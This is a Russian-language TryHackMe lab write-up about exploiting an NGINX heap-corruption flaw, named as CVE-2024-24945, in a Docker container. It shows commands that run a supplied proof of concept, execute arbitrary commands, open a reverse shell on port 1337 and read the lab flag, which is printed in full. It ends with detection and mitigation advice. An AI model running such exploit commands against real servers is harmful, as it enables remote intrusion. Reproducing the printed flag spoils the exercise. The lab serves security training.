Эта лабораторная работа демонстрирует эксплуатацию уязвимости CVE-2024-24945 — повреждения кучи, затрагивающего NGINX. Цель заключалась в понимании того, как повреждение памяти может привести к удалённому выполнению кода (RCE), и получении практического опыта в методах эксплуатации, обнаружения и смягчения последствий.
Эта лабораторная работа демонстрирует эксплуатацию уязвимости CVE-2024-24945, уязвимости повреждения кучи, затрагивающей NGINX. Цель состояла в том, чтобы понять, как повреждение памяти может привести к удаленному выполнению кода (RCE) и получить практический опыт в методах эксплуатации, обнаружения и смягчения последствий.
. Проверить уязвимый сервис NGINX. . Выполнить произвольные команды с помощью предоставленной концепции (PoC). . Получить обратную оболочку на целевом контейнере. . Извлечь флаг задания. . Понять стратегии обнаружения и смягчения последствий.
. Платформа: TryHackMe . Целевой сервис: NGINX RIFT . Контейнерная среда: Docker . Инструмент эксплуатации: poc.py . Метод доступа: VNC (Virtual Network Computing)
Проверка сервиса
Подтверждено, что уязвимый контейнер работает и доступен.
sudo docker ps
curl -s http://127.0.0.1:19321/api/users/42
backend ок
Выполнил предоставленный PoC для проверки выполнения произвольных команд.
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned
Проверка успешного выполнения:
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned
Вывод: hello from depthfirst
Установить интерактивную оболочку на целевом контейнере.
python3 poc.py --shell
Успешное подключение:
[] listening for reverse shell on port 1337... [] connected. $
Получен флаг задания.
cat /flag.txt
THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}
Защитники могут выявить попытки эксплуатации через:
. Аварийные завершения рабочих процессов NGINX . События ошибки сегментации . Неожиданные исходящие сетевые соединения . Подозрительные процессы оболочки (/bin/sh,bash) . Несанкционированное создание файлов во временных каталогах
. Обновиться до исправленной версии NGINX. . Применить принцип минимальных привилегий . . Ограничить ненужный исходящий сетевой трафик . Внедрить непрерывный мониторинг журналов. . Использовать средства безопасности контейнеров и мониторинг во время выполнения
Эта лабораторная работа предоставила практический опыт в:
. Понимание уязвимостей повреждения кучи. . Эксплуатация недостатков удаленного выполнения кода. . Установление обратных оболочек. . Выполнение проверки после эксплуатации. . Распознавание индикаторов компрометации и методов смягчения последствий.
Это упражнение было выполнено в контролируемой лабораторной среде TryHackMe только в образовательных целях и для обучения кибербезопасности.
Author: [Benedict Ejepu Amaechi] Platform: TryHackMe Тема: CVE-2024-24945 9NGINX RIFT0 Эксплуатация и защита Дата завершения: июнь 2026